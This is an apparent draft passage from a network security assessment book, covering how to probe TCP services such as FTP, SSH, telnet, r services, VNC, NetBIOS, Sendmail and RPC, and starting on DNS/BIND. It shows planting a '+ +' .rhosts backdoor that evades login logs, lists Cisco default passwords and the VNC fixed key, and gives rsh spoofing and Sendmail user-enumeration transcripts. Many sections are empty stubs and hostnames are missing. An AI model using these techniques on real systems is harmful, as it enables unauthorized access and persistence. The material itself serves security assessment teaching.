    17 | RedHat 6.2 (Zoot) [wu-ftpd-2.6.0-3.i386.rpm]
    18 | RedHat 7.0 (Guinness) [wu-ftpd-2.6.1-6.i386.rpm]
    19 | RedHat 7.1 (Seawolf) [wu-ftpd-2.6.1-16.rpm]
    20 | RedHat 7.2 (Enigma) [wu-ftpd-2.6.1-18.i386.rpm]
    21 | SuSE 6.0|6.1 update [wuftpd-2.6.0-151.i386.rpm]
    22 | SuSE 6.0|6.1 update wu-2.4.2 [wuftpd-2.6.0-151.i386.rpm]
    23 | SuSE 6.2 update [wu-ftpd-2.6.0-1.i386.rpm]
    24 | SuSE 6.2 update [wuftpd-2.6.0-121.i386.rpm]
    25 | SuSE 6.2 update wu-2.4.2 [wuftpd-2.6.0-121.i386.rpm]
    26 | SuSE 7.0 [wuftpd.rpm]
    27 | SuSE 7.0 wu-2.4.2 [wuftpd.rpm]
    28 | SuSE 7.1 [wuftpd.rpm]
    29 | SuSE 7.1 wu-2.4.2 [wuftpd.rpm]
    30 | SuSE 7.2 [wuftpd.rpm]
    31 | SuSE 7.2 wu-2.4.2 [wuftpd.rpm]
    32 | SuSE 7.3 [wuftpd.rpm]
    33 | SuSE 7.3 wu-2.4.2 [wuftpd.rpm]
    34 | Slackware 7.1

The tool can be easily run with the -a flag, which allows 7350wurm  to  grab
the banner of the target FTP server and select  the  correct  target  memory
addresses and padding values from its target list.

ProFTPD Vulnerabilities




The current version of SSH that a target host is running can be  ascertained
by simply using telnet to connect to TCP port  22  of  the  host,  as  shown

   # telnet 22
   Connected to
   Escape character is '^]'.

In this example the host is running OpenSSH 3.5 patch level 1 using the  SSH
2.0 protocol. Hosts found running the old SSH 1.0 protocol are rare  on  the
Internet at the time of writing, as the SSH  2.0  protocol  introduces  many
useful security features.

Security conscious administrators  will  often  modify  the  SSH  banner  to
present the following information:

   # telnet 22
   Connected to
   Escape character is '^]'.

In this second example the SSH service supports the SSH  2.0  protocol,  but
the actual type and version of the service itself is unknown (as it  is  set
to 0.0.0).

To properly interact with SSH and log in, we  require  an  SSH  client.  SSH
clients can be found under most recent  Unix-based  platforms,  and  OpenSSH
( is a popular package containing both the  SSH  server  and
client utilities for key pair generation and connection to SSH services.

For Windows users, PuTTY is a freely  downloadable  tool  available  with  a
host of other  SSH  client  utilities  (including  PSCP,  PSFTP  and  Plink)
available from

Commercial SSH Vulnerabilities

OpenSSH Vulnerabilities

Ssh 1 CRC bug


challenge response / PAM


Common Telnet Banner List

Sun Solaris 8:

   SunOS 5.8

Sun Solaris 2.6:

   SunOS 5.6

Sun Solaris 2.4 and 2.5.1:

   UNIX(r) System V Release 4.0 (hostname)

SunOS 4.1.x

   SunOS UNIX (hostname)


   FreeBSD/i386 (hostname) (ttyp1)


   NetBSD/i386 (hostname) (ttyp1)


   OpenBSD/i386 (hostname) (ttyp1)

Red Hat Linux 8.0

   Red Hat Linux release 8.0 (Psyche)

Debian Linux 3.0

   Debian GNU/Linux 3.0 / hostname


   IRIX (hostname)

IBM AIX 4.1.x:

   AIX Version 4
   (C) Copyrights by IBM and by others 1982, 1994.

IBM AIX 4.2.x and 4.3.x

   AIX Version 4
   (C) Copyrights by IBM and by others 1982, 1996.

Nokia IPSO:

      IPSO (hostname) (ttyp0)

Cisco IOS:

   User Access Verification


Livingstone ComOS:

   ComOS - Livingston PortMaster

Sun Telnet Vulnerabilities

Loginex overflow affecting Solaris 6 - 8

BSD Telnet Vulnerabilities

Bsd overflow

Linux Telnet Vulnerabilities

Netkit telnetd remote

IRIX Telnet Vulnerabilities

Ld_so preload or whatever it was..

AIX Telnet Vulnerabilities

Bsd overflow

Appliance Server, Router & Switch Telnet Vulnerabilities

Ipso user enumeration:

   Trying ... Open

      IPSO (checkpointcharlie) (ttyp0)

   login: root
   Login incorrect
   login: blaaah
   Login incorrect
   login: fw1adm
   Login incorrect
   login: fw1adm
   Login incorrect
   Login timed out after 300 seconds
   [Connection to closed by foreign host]

Cisco default passes, enable, system, cisco, router, admin, Cisco, !cisco

R Services

Unix  r  services  are  common  to  commercial   Unix-based   platforms   in
particular, including Solaris, HP-UX and AIX. These services are  listed  in
the services file as:

   exec            512/tcp
   login           513/tcp
   shell           514/tcp

Each of  these  services  run  using  standard  PAM  username  and  password
authentication,   which   is   in   turn   overridden   by   ~/.rhosts   and
/etc/hosts.equiv file entries. Within Unix, the exec service is rexecd,  the
login service is rlogind, and the shell service is rshd.

Accessing r services

From a Unix platform, rsh, rlogin and rexec clients are used to  access  the
respective r services running on a remote host. Figure 31  below  shows  the
usage for each client when run from the Unix command shell.

       Figure 31: Running rsh, rlogin and rexec from the command shell
   # rsh
   usage: rsh [-nd] [-l login] host [command]
   # rlogin
   usage: rlogin [ -8EL] [-e char] [ -l username ] host
   # rexec
   rexec: Require at least a host name and command.
   Usage: rexec [ -abcdhns ] -l username -p password  host
        -l username: Sets the login name for the remote host.
        -p password: Sets the password for the remote host.
        -n: Explicitly prompt for name and password.
        -a: Do not set up an auxiliary channel for standard
        -b: Use BSD-rsh type signal handling.
        -c: Do not close remote standard in when local input
        -d: Turn on debugging information.
        -h: Print this usage message.
        -s: Do not echo signals to the remote process.

Unix ~/.rhosts and /etc/hosts.equiv files

The .rhosts file exists in the user home directory under Unix, containing  a
list of username and IP address or  machine  hostname  pairs,  such  as  the

   # pwd
   # cat .rhosts

In this example, I can use any of the r services (rsh, rlogin or  rexec)  to
connect to this host from if I am logged into  the  host
as chris, or from with any username on that host.

When a user connects to the host  running  rshd  (the  remote  shell  daemon
running on TCP port 514), the source IP address is cross-referenced  against
the .rhosts file and verified by querying the identd service running at  the
source. If these details are found to be valid, then direct access is  given
to the host without even requiring a password.

A simple yet effective backdoor for most Unix-based systems running rshd  is
to place an .rhosts file in the home directory of the  bin  user  (/usr/bin/
under Solaris) containing the wildcard '+ +'  for  any  user  at  any  host.
Figure 32 below demonstrates this backdoor being planted and  used  to  gain
access to the host:

      Figure 32: Planting and accessing a simple .rhosts rshd backdoor
   # echo + + > /usr/bin/.rhosts
   # exit
   hacker@host/$ rsh -l bin csh -i
   Warning: no access to tty; thus no job control in this
   www% w
     5:45pm  up 33 day(s), 15 min(s),  1 user,  load average:
   0.00, 0.00, 0.01
   User     tty           login@  idle   JCPU   PCPU  what
   root     console      19Dec0219days                -sh

A useful feature with the rshd service is that terminals  are  not  assigned
to processes run through rsh. This means that bin access  through  our  rshd
backdoor does not appear in the utmp or wtmp logs,  and  is  cloaked  within
the system (not appearing within w  or  who  listings).  Unfortunately,  the
network connection into TCP port 514  will  appear  if  a  user  executes  a
netstat -a command, and processes run by the bin user will  also  appear  in
ps -ef listings.

      It is very easy to get from bin to root under Unix-based  systems,  as
      the bin user owns many binaries that run  as  system  services  (found
      under  directories  including   /usr/sbin/)   with   super-user   root

The /etc/hosts.equiv file is a system level  file  used  to  define  trusted
hostnames or IP addresses that can freely access r services. SunOS  4.1.3_U1
shipped with a '+' wildcard  in  the  /etc/hosts.equiv  file,  allowing  for
attackers to gain direct bin level access to  SunOS  4.1.3_U1  servers  with
TCP port 514 open.

Testing the security of r services

User passwords can be brute forced across  rlogind,  as  the  service  calls
/bin/login and the standard PAM mechanism. The rshd and rexecd  services  do
not pass username and password details to the login  program  in  this  way,
and merely rely on .rhosts and /etc/hosts.equiv entries for authentication.

It is recommended that for each user enumerated  through  finger,  SMTP  and
other information leak vulnerabilities, attempts  are  made  to  access  the
host directly through open r services in the following fashion:

   # rsh -l chris csh -i
   permission denied
   # rsh -l test csh -i
   permission denied
   # rsh -l root csh -i
   permission denied
   # rsh -l bin csh -i
   Warning: no access to tty; thus no job control in this

It will be possible to use rsh to log into a Solaris server as root  if  the
user's password has not been set. I have seen  this  only  once  in  a  live
environment, during  an  onsite  audit  I  undertook  in  a  hosting  centre
containing Solaris web servers that had  been  built  and  configured  using
automatic scripts.

Spoofing connections to the rsh service

If you are aware of trust between  hosts  or  have  seen  .rhosts  files  on
compromised servers, tools can be used to spoof rsh connections by using  IP
sequence prediction and falsified  client  responses  to  match  entries  in
.rhosts files server-side. A good tool used to perform such rsh spoofing  is
ADMrsh, available from the ADM website at The  utility
requires the latest version of ADMspoof and its header files (found in  ADM-
spoof-NEW.tgz at the time of writing), and its usage is shown below:


    It's very easy to use (like all the ADM products).

    ADMrsh [ips] [ipd] [ipl]  [luser] [ruser] [cmd]

    Parameters List :
    ips   =   ip source (ip of the trusted host)
    ipd   =   ip destination (ip of the victim)
    ipl   =   ip local (your ip to receive the informations)
    luser =   local user
    ruser =   remote user
    cmd   =   command to execute

    If ya don't understand, this is an example :

    ADMrsh root root "echo/"+

    Credit's : Heike , ALL ADM CreW , !w00w00 , Darknet
    ADMrsh 0.5 pub (c) ADM  <-- hehe ;)

X Windows

Tcp 6000

Microsoft Remote Desktop Protocol

Remote Desktop Protocol (RDP) is used as a terminal service for thin  client
access to the Windows desktop across a network. The  service  can  be  found
running on TCP port 3389, and the Microsoft  terminal  services  (or  Remote
Desktop within Windows XP) client is used to connect to the RDP service,  as
shown in figure xx.

        Figure xx: Connecting to RDP using the remote desktop client


AT&T's  Virtual  Network  Computing  (VNC)   package   is   available   from VNC is a free  and  simple  to  deploy  remote
desktop access system for Windows systems, and can  be  found  running  over
the following TCP ports:

   Port 5800 for HTTP access to VNC using a Java client through a web
   Port 5900 for direct access to VNC using the native vncviewer.exe

From  a  security  perspective  VNC   is   relatively   straightforward   to
compromise. The main problem with VNC  security  is  in  the  authentication
phase when a user connects to  the  service,  below  is  a  screenshot  from


VNC only requires one piece of data for authentication purposes,  a  session
password (which has a  maximum  length  of  8  characters).  On  the  target
server, the VNC password string is stored in the Windows registry under  the
following keys:



A fixed key is used to encrypt the VNC password using DES, and so if we  can
gain read access to the registry across the  network  (often  accessible  on
poorly protected Windows hosts),  it  is  possible  to  compromise  the  VNC
session password. The current fixed  key  can  be  retrieved  from  the  VNC
source code, available from the AT&T site. At the time of writing the  fixed
key found in VNC is 23 82 10 76 35 78 88 7.


VNCrack by FX of Phenoelit is a Unix-based  VNC  hacking  utility  available
from  VNCrack  is  capable  of  performing   the
following attacks against VNC servers:

Cracking of the Windows  registry  hex  values  to  compromise  the  session
Direct brute force of the VNC session password

The VNC handshake can be sniffed and the session password compromised  using
the Unix-based PHoss network sniffing utility, available from  Phenoelit  at


PCAnywhere listens on ports 22 (TCP and UDP), 5631  (TCP)  "pcanywheredata",
and 5632 (TCP and UDP) "pcanywherestat), and 65301 (TCP).


Citrix is a scalable thin client Windows service that is  accessed  directly
through TCP port 1494 and high dynamic ports (above 1024)  server-side.  The
protocol  that  Citrix  uses  is  known  as   ICA   (Independent   Computing
Architecture), and upon locating a server with TCP port 1494 open, a  Citrix
ICA client should be selected  and  used  to  connect  to  the  service  for
further              investigation              (available              from


TCP port 799

Various vulnerabilities found in 1999 by ISS

Microsoft Windows Networking TCP Services

Microsoft Windows networking services  involve  use  of  the  following  TCP
services server-side:


UDP ports 137  and  138  are  used  primarily  within  Windows  domains  and
networks to facilitate name lookup and other functions, which are  discussed
in the next chapter.

client / server communication           135

common internet file system       139 & 445

file sharing session              139

login sequence                    139

UDP ports 137 and 138 are used for various NetBIOS naming lookup  functions,
which are covered in the following Chapter.

The SMB (Server Message Block) protocol is used among other things for  file
sharing in Windows NT / 2000. In Windows NT it ran on top  of  NBT  (NetBIOS
over TCP/IP), which used the famous ports 137, 138 (UDP) and 139  (TCP).  In
Windows 2000, Microsoft added the  possibility  to  run  SMB  directly  over
TCP/IP, without the extra layer of NBT. For this they use TCP port 445.

Microsoft DCE Locator Service running on port 135

Microsoft DCE Locator service aka. end-point mapper. It works like  Sun  RPC
portmapper, except that  end-points  can  also  be  named  pipes.  Microsoft
relies upon DCE RPC to remotely manage  services.  Some  services  that  use
port 135 of end-point mapping include DNS, WINS, Exchange and the  Messenger

Enumerate system information through the DCE Locator Service

Through the DCE locator service we can primarily enumerate the following:

IP addresses used on other network interfaces
Details of services using dynamic high ports


Epdump is a Windows command-line utility that can be used to query  the  DCE
locator service running on TCP port 135 of the target host in the  following

   binding is nil
   int 5a7b91f8-ff00-11d0-a9b2-00c04fb6e6fc v1.0
      binding 00000000-0000-0000-0000-
      annot 'Messenger Service'
   int 1ff70682-0a51-30e8-076d-740be8cee98b v1.0
      binding 00000000-0000-0000-0000-
      annot ''
   int 1ff70682-0a51-30e8-076d-740be8cee98b v1.0
      binding 00000000-0000-0000-0000-
      annot ''
   int 1ff70682-0a51-30e8-076d-740be8cee98b v1.0
      binding 00000000-0000-0000-0000-

      annot ''
   int 1ff70682-0a51-30e8-076d-740be8cee98b v1.0
      binding 00000000-0000-0000-0000-

      annot ''
   int 1ff70682-0a51-30e8-076d-740be8cee98b v1.0
      binding 00000000-0000-0000-0000-
      annot ''
   int 378e52b0-c0a9-11cf-822d-00aa0051e40f v1.0
      binding 00000000-0000-0000-0000-
      annot ''
   int 378e52b0-c0a9-11cf-822d-00aa0051e40f v1.0
      binding 00000000-0000-0000-0000-
      annot ''
   int 378e52b0-c0a9-11cf-822d-00aa0051e40f v1.0
      binding 00000000-0000-0000-0000-

      annot ''
   int 378e52b0-c0a9-11cf-822d-00aa0051e40f v1.0
      binding 00000000-0000-0000-0000-

      annot ''
   int 378e52b0-c0a9-11cf-822d-00aa0051e40f v1.0
      binding 00000000-0000-0000-0000-
      annot ''
   int 5a7b91f8-ff00-11d0-a9b2-00c04fb6e6fc v1.0
      binding 00000000-0000-0000-0000-
      annot 'Messenger Service'
   int 5a7b91f8-ff00-11d0-a9b2-00c04fb6e6fc v1.0
      binding 00000000-0000-0000-0000-
      annot 'Messenger Service'
   int 5a7b91f8-ff00-11d0-a9b2-00c04fb6e6fc v1.0
      binding 00000000-0000-0000-0000-
      annot 'Messenger Service'
   int 5a7b91f8-ff00-11d0-a9b2-00c04fb6e6fc v1.0
      binding 00000000-0000-0000-0000-
      annot 'Messenger Service'
   int 5a7b91f8-ff00-11d0-a9b2-00c04fb6e6fc v1.0
      binding 00000000-0000-0000-0000-
      annot 'Messenger Service'
   int 5a7b91f8-ff00-11d0-a9b2-00c04fb6e6fc v1.0
      binding 00000000-0000-0000-0000-

      annot 'Messenger Service'
   int 5a7b91f8-ff00-11d0-a9b2-00c04fb6e6fc v1.0
      binding 00000000-0000-0000-0000-

      annot 'Messenger Service'
   no more entries



Dave Aitel wrote a simple yet effective Unix version of the epdump  utility,
called dcetest. The dcetest tool is run in a similar fashion,  with  similar

Brute force of user passwords through the DCE Locator Service

WMIcracker.exe uses TCP 135 to access the WMI and brute force  passwords  of
users in the administrators group

Remotely running arbitrary code or crashing the DCE Locator Service

Two particular vulnerabilities were disclosed in  late  2002  regarding  the
DCE locator service and flaws within the program that can lead to  arbitrary
code being run or the service crashing. The bug is  present  in  Windows  NT
4.0 through to XP.

In particular, two articles are of interest:

Microsoft NetBIOS Session Service running on port 139

NetBIOS Session (TCP), Windows File and Printer Sharing

Enumeration through the NetBIOS session service

Various tools can be used to enumerate a lot of sensitive  information  from
a target Windows workstation or server with TCP port 139  open.  Information
can be gleaned either anonymously by setting up what  is  known  as  a  null
session, or through knowledge of a valid username and password.

By default, Windows NT and 2000 hosts do not prohibit  anonymous  access  to
information through NetBIOS, and so the following can be gleaned:

User list
Machine list
NetBIOS name list
Share list
Password policy information
Group and member list
Local Security Authority policy information
Trust information between domains and hosts
NIC IP and MAC addresses

Three tools in particular are very good at enumerating this information


dumpsec /computer=IPaddress /rpt=users /saveas=tsv /outfile=users.txt


Brute force of user passwords through the NetBIOS session service

SMBcrack.exe uses TCP 139 and crafts SMB packets

net use * //target/share passwd/user:domain/username

VPN & Remote Network Access Services

IPsec VPN tunnels and  services  do  not  even  use  standard  IP,  and  are
therefore lie outside of the scope of this book. However,  vendors  such  as
Checkpoint use  IP  for  VPN  communication,  which  is  often  more  widely

IP-based VPN and remote network access services are as follows:

   FW1-secureremote  256/tcp    # also "rap"
   FW1-mc-fwmodule   257/tcp    # FW1 management console for
   communication w/module
   Fw1-mc-gui        258/tcp    # also yak winsock personal chat
   FW1-or-bgmp       264/udp    # FW1 secureremote alternate
   isakmp         500/tcp        # ISAKMP

Checkpoint VPN

256  (TCP)  Certificate/key  distribution.  VPN  clients  (SecuRemote)   can
download keys on this port.

257 (TCP) logging

258 (TCP) Remote control over policy editing.


Microsoft PPTP

Point to Point Tunneling Protocol - tcp/1723


Internet Security Association and Key Management Protocol (ISAKMP)

This port is available on most  systems  that  support  IPsec.  Many  IPsec-
compatible  VPN  providers  use  this  port,  such  as  Nortel/Bay  Networks
Extranet Access Client.

Tcp and udp 500

Ike-scan by nta monitor

Queries isakmp and works out vpn gateway type from responses

Network Proxy Services

Squid 3128

Socks 1080

Web 8080

It is possible to port scan through socks et al

E-Mail & News Services

Services used for e-mail and news delivery listed  from  the  services  file
are as follows:

   smtp            25/tcp
   pop2            109/tcp
   pop3            110/tcp
   nntp            119/tcp
   imap2           143/tcp


Most Unix-based systems run Sendmail, including Linux, Solaris, OpenBSD  and
others. Sendmail  is  particularly  vulnerable  to  two  specific  types  of

Information leak vulnerabilities
Process manipulation vulnerabilities

Sendmail Information Leak Vulnerabilities

If the Sendmail banner is  obfuscated  or  modified,  the  true  version  of
Sendmail can usually be ascertained by issuing a HELP request (Sun  Sendmail
8.9.3 in this case):

   # telnet 25
   Connected to
   Escape character is '^]'.
   220 ESMTP Sendmail ready at Tue, 7 Jan
   2003 02:25:20 -0800 (PST)
   HELO world
   250 Hello
   [] (may be forged), pleased to meet you
   214-This is Sendmail version 8.9.3+Sun
   214-    HELO    MAIL    RCPT    DATA    RSET
   214-    NOOP    QUIT    HELP    VRFY    EXPN
   214-For more info use "HELP <topic>".
   214-To report bugs in the implementation contact Sun
   214-Technical Support.
   214-For local information contact postmaster at this site.
   214 End of HELP info

Valid user account details can be enumerated using one of three techniques:

   EXPN username
   VRFY username
   RCPT TO:username


The Sendmail EXPN command is historically used to  expand  details  about  a
given SMTP e-mail address. Detailed in figure xx  below,  we  can  ascertain
the following:

The test user account does not exist locally on the server
E-mail for root is infact sent to
The sshd user account exists locally with the real name of sshd privsep
               Figure xx: Using EXPN to enumerate user details
   # telnet 25
   Connected to
   Escape character is '^]'.
   220 mail2 ESMTP Sendmail 8.12.6/8.12.5 ready at Wed, 8 Jan
   2003 03:19:58 -0700 (MST)
   HELO world
   250 mail2 Hello onyx [] (may be forged), pleased
   to meet you
   EXPN test
   550 5.1.1 test... User unknown
   EXPN root
   250 2.1.5 <>
   EXPN sshd
   250 2.1.5 sshd privsep <sshd@mail2>


The Sendmail VRFY command is historically used to verify that a  given  SMTP
e-mail address is valid. We can abuse this feature to enumerate valid  local
user accounts, as detailed in figure xx below.

              Figure xx: Using VRFY to enumerate user accounts
   # telnet 25
   Connected to
   Escape character is '^]'.
   220 mail2 ESMTP Sendmail 8.12.6/8.12.5 ready at Wed, 8 Jan
   2003 03:19:58 -0700 (MST)
   HELO world
   250 mail2 Hello onyx [] (may be forged), pleased
   to meet you
   VRFY test
   550 5.1.1 test... User unknown
   VRFY chris
   250 2.1.5 Chris McNab <chris@mail2>


I have found this technique to be extremely effective at enumerating  active
user accounts on  even  the  most  secure  hosts.  Many  security  conscious
network  administrators  ensure  that  EXPN  and  VRFY  commands   are   not
accessible,  but  the  RCPT  TO:  enumeration  bug  takes  advantage  of   a
vulnerability deep within the Sendmail  program,  one  that  is  not  easily
removed without modification of source code.

          Figure xx: Executing the RCPT TO: user enumeration attack
   # telnet 25
   Connected to
   Escape character is '^]'.
   220 mail2 ESMTP Sendmail 8.12.6/8.12.5 ready at Wed, 8 Jan
   2003 03:19:58 -0700 (MST)
   HELO world
   250 mail2 Hello onyx [] (may be forged), pleased
   to meet you
   250 2.1.0 Sender ok
   RCPT TO:test
   550 5.1.1 test... User unknown
   RCPT TO:admin
   550 5.1.1 admin... User unknown
   RCPT TO:chris
   250 2.1.5 chris... Recipient ok

Even Sendmail services protected by a firewall  SMTP  proxy  (such  as  that
found on the Watchguard Firebox) are vulnerable  to  the  RCPT  TO:  attack,
though suspicious commands such as EXPN, VRFY  and  HELP  are  filtered,  as
shown below in figure xx.

     Figure xx: Enumerating local users with Sendmail behind a firewall
   # telnet 25
   Connected to
   Escape character is '^]'.
   HELO world
   250 Hello onyx [],
   pleased to meet you
   EXPN test
   500 5.5.1 Command unrecognized: "XXXX test"
   VRFY test
   500 5.5.1 Command unrecognized: "XXXX test"
   500 5.5.1 Command unrecognized: "XXXX"
   250 2.1.0 Sender ok
   RCPT TO:test
   550 5.1.1 test... User unknown
   RCPT TO:chris
   250 2.1.5 chris... Recipient ok
   RCPT TO:nick
   250 2.1.5 nick... Recipient ok

Sendmail Process Manipulation Vulnerabilities

The following  remotely  exploitable  process  manipulation  vulnerabilities
exist in Sendmail:

Sendmail 8.8.3 and 8.8.4 MIME conversion buffer overflow (CVE-1999-0057)

MS Exchange ESMTP


MS Exchange POP3

Web Services

HTTP and HTTPS services can be assessed using the following:





Microsoft IIS


ISAPI filters



Netscape enterprise


Proxy Services

Squid - 3128

Socks - 1080


HTTP CONNECT proxy on port 80

Database Services

Services that can be used by systems administrators or server  operators  to
directly access

   1521 / 1524 (oracle), 1433, 3307 ?? (mysql), postgres.. etc.
   sybase            2638/tcp   # Sybase database
   66 (TCP/UDP)   Early assignment for Oracle SQL*NET
   118 (TCP/UDP)  sqlserv
   150 (TCP/UDP)  SQL-NET
   156 (TCP/UDP)  sqlsrv
   1114 (TCP/UDP) mini-SQL
   1433 (TCP/UDP) Microsoft SQL Server
   1434 (TCP/UDP) Microsoft SQL Monitor
   1498 (TCP/UDP) Sybase SQL AnyWhere
   1521 (TCP)     Oracle SQL*Net v2
   1522 (TCP)     Oracle
   1525 (TCP)     Oracle SQL*Net v1
   1529 (TCP)     Oracle SQL*Net
   1978 (TCP/UDP) UniSQL
   1979 (TCP)     UniSQL Java
   3306 (TCP/UDP) mySQL
   3352 (TCP/UDP) SSQL
   4333 (TCP)     mSQL

Unix RPC Services

A number of interesting Unix services  (including  NIS+  and  NFS)  are  RPC
services. RPC stands for Remote Procedure Call, and RPC services  often  run
on dynamically assigned high  ports.  To  track  and  present  clients  with
accurate service details, an RPC portmapper  service  listens  on  TCP  (and
sometimes UDP) port 111. The portmapper service can  be  queried  using  the
rpcinfo command found on most Unix-based platforms:

   # rpcinfo -p
   program vers proto port  service
   100000   4    tcp  111   rpcbind
   100000   4    udp  111   rpcbind
   100024   1    udp  32772 status
   100024   1    tcp  32771 status
   100021   4    udp  4045  nlockmgr
   100021   2    tcp  4045  nlockmgr
   100005   1    udp  32781 mountd
   100005   1    tcp  32776 mountd
   100003   2    udp  2049  nfs
   100011   1    udp  32822 rquotad
   100002   2    udp  32823 rusersd
   100002   3    tcp  33180 rusersd

In this case, the Solaris server  at  hand  is  running  the  following  RPC

Status (also known as rpc.statd) on TCP port 32771 and UDP port 32772
Nlockmgr (also known as rpc.lockd) on TCP and UDP port 4045
NFS on UDP port 2049
Rquotad on UDP port 32822
Rusersd on TCP port 33180 and UDP port 32823

These services can then be  accessed  and  queried  directly,  using  client
software such as showmount and mount (for  accessing  NFS  and  its  status,
lockd & rquotad  components),  and  rusers  as  discussed  earlier  in  this

A list of popular RPC services along with their  respective  prognum  values
is as follows (taken from the Unix /etc/rpc file):

   portmapper      100000  portmap sunrpc
   rstatd          100001  rstat rstat_svc rup perfmeter
   rusersd         100002  rusers
   nfs             100003  nfsprog
   ypserv          100004  ypprog
   mountd          100005  mount showmount
   ypbind          100007
   walld           100008  rwall shutdown
   yppasswdd       100009  yppasswd
   etherstatd      100010  etherstat
   rquotad         100011  rquotaprog quota rquota
   sprayd          100012  spray
   3270_mapper     100013
   rje_mapper      100014
   selection_svc   100015  selnsvc
   database_svc    100016
   rexd            100017  rex
   alis            100018
   sched           100019
   llockmgr        100020
   nlockmgr        100021
   x25.inr         100022
   statmon         100023
   status          100024
   bootparam       100026
   ypupdated       100028  ypupdate
   keyserv         100029  keyserver
   tfsd            100037
   nsed            100038
   nsemntd         100039
   ypxfrd          100069
   pcnfsd          150001
   amd             300019  amq
   sgi_fam         391002

Identifying RPC Services Without the Portmapper

In networks protected by firewalls and other mechanisms, it is not  uncommon
for access to  the  RPC  portmapper  service  running  on  port  111  to  be
filtered. Determined attackers will often scan  high  port  ranges  (usually
between 32000 and 33000) looking for RPC services listening on  high  ports,
and then attempt to compromise these RPC services.

A list of common RPC service ports and their respective  daemons  under  the
Sun Microsystems Solaris operating platform is as follows (taken from  nmap-

   sometimes-rpc5    32771/tcp  # Sometimes rusersd
   sometimes-rpc6    32771/udp  # Sometimes rusersd
   sometimes-rpc7    32772/tcp  # Sometimes status
   sometimes-rpc8    32772/udp  # Sometimes status
   sometimes-rpc9    32773/tcp  # Sometimes rquotad
   sometimes-rpc10   32773/udp  # Sometimes rquotad
   sometimes-rpc11   32774/tcp  # Sometimes rusersd
   sometimes-rpc12   32774/udp  # Sometimes rusersd
   sometimes-rpc13   32775/tcp  # Sometimes status
   sometimes-rpc14   32775/udp  # Sometimes status
   sometimes-rpc15   32776/tcp  # Sometimes sprayd
   sometimes-rpc16   32776/udp  # Sometimes sprayd
   sometimes-rpc17   32777/tcp  # Sometimes walld
   sometimes-rpc18   32777/udp  # Sometimes walld
   sometimes-rpc19   32778/tcp  # Sometimes rstatd
   sometimes-rpc20   32778/udp  # Sometimes rstatd
   sometimes-rpc25   32786/tcp  # Sometimes mountd
   sometimes-rpc27   32787/tcp  # Sometimes dmispd (DMI Service

RPC Services of Interest


On host command



Rusers -l host


Showmount -e host




Nlockmgr & status

Ypbind & ypupdated

Network Printing Services

Primarily when assessing  internal  networks,  printers  and  other  devices
which using IP can be found. In particular, HP printers are  commonly  found
with specific TCP ports open. A listing of common network printing  services

9100  HP management

hp-fun.c by sil

515   LPD

----[ 2.1 Chapter 6, Assessing UDP Network Services

                                              Assessing UDP Network Services

This chapter focuses on the steps taken  to  properly  test  accessible  UDP
network  services  during  a  network  security  assessment  exercise.   UDP
services are often accessible on poorly configured or protected hosts;  with
vulnerable services that can be abused to glean network information,  or  to
compromise network devices directly through process manipulation and  buffer
overflow attacks.

In particular, the assessment five key  UDP  services  is  covered  in  this

   DNS, listening on port 53
   SNMP, listening on port 161
   TFTP, listening on port 69
   DHCP, listening on ports 67 and 68
   Rwhod, listening on port 513


The DNS service uses two ports to fulfill requests; UDP  port  53  to  serve
standard direct requests (to resolve names to IP addresses and vice  versa),
and TCP port 53 to serve DNS zone information during a  DNS  zone  transfer.
This following section relates entirely to the  assessment  and  probing  of
DNS over UDP.

Retrieving DNS Version Information

DNS server version information can be gleaned directly across  UDP  port  53
by issuing a version.bind chaos txt request through the Unix dig utility  as
shown in figure xx. In our example against, we  find  that
BIND 9.2.1 is running.

          Figure xx: Using dig to retrieve BIND version information
   # dig version.bind chaos txt

   ; <<>> DiG 9.2.0 <<>> version.bind chaos
   ;; global options:  printcmd
   ;; Got answer:
   ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 21612
   ;; flags: qr aa rd; QUERY: 1, ANSWER: 1, AUTHORITY: 0,

   ;version.bind.                  CH      TXT

   version.bind.           0       CH      TXT     "9.2.1"

   ;; Query time: 29 msec
   ;; SERVER:
   ;; MSG SIZE  rcvd: 48

If you do not have access to the dig utility, nslookup can  be  used  in  an
interactive fashion  from  Windows,  Unix  or  MacOS  to  perform  the  same
version.bind request, as shown in figure xx. In this second example we  find
that is running BIND 4.9.11, one of the latest  versions  of
the BIND 4 DNS server software.

       Figure xx: Using nslookup to retrieve BIND version information
   # nslookup
   > server
   Default server:
   > set class=chaos
   > set type=txt
   > version.bind

   VERSION.BIND    text = "4.9.11-REL"

BIND Vulnerabilities

The Berkeley Internet Name Daemon is run on most  Unix  name  servers.  BIND
has been found to be vulnerable to a plethora of buffer overflow and  denial
of service attacks over recent years, and the Internet  Software  Consortium
has  created  a  very  useful  HTML  page  to  track  all   publicly   known
vulnerabilities  in  BIND,  accessible  at
security.html. At the  bottom  of  the  ISC  page  is  an  excellent  matrix
documenting exactly which versions of BIND  are  vulnerable  to  each  known
attack. What follows is a summary of  remotely  exploitable  vulnerabilities
within BIND to date, with details of the affected versions of software.

Remote Execution of Code Vulnerabilities in BIND

SIG overflow, affecting BIND 4.9.5 - 4.9.10, 8.1, 8.2 - 8.2.6  and  8.3.0  -
NXDOMAIN overflow, affecting BIND 8.2 - 8.2.6 and 8.3.0 - 8.3.3
libresolv overflow, affecting BIND 4.9.2 - 4.9.10
OpenSSL overflow, affecting BIND 9.1.0 and 9.2.x if built with SSL support
libbind overflow, affecting all versions of the stub resolver  library  from
BIND 4 prior to 4.9.9, BIND 8 prior to 8.2.6 and 8.3.0  -  8.3.2,  and  BIND
9.2.0 (also 9.2.1 if compiled with -enable-libbind)
TSIG overflow, affecting BIND 8.2, 8.2.1, 8.2.2 patch levels 1 - 7  and  all
8.2.3 beta releases
NslookupComplain() bug, affecting BIND  4.9.3,  4.9.4,  4.9.5,  4.9.5  patch
level 1, 4.9.6 and 4.9.7
NXT record overflow bug, affecting BIND 8.2, 8.2 patch level 1 and 8.2.1

Remote Denial of Service (DoS) Vulnerabilities in BIND

Internal consistency check vulnerability,  affecting  all  BIND  9  versions
prior to 9.2.1
ZXFR vulnerability, affecting BIND 8.2.2 and patch levels 1 - 6
sigdiv0 vulnerability, affecting BIND 8.2, 8.2.1 and 8.2.2 patch levels 1  -
SRV record bug, affecting BIND 8.2, 8.2.1 and 8.2.2 patch levels 1 - 6
SO_LINGER timeout bug, affecting BIND 8.1, 8.1.1, 8.1.2, 8.2 and 8.2.1
FDMAX vulnerability, affecting BIND 8.1, 8.1.1, 8.1.2,  8.2  and  8.2  patch
level 1
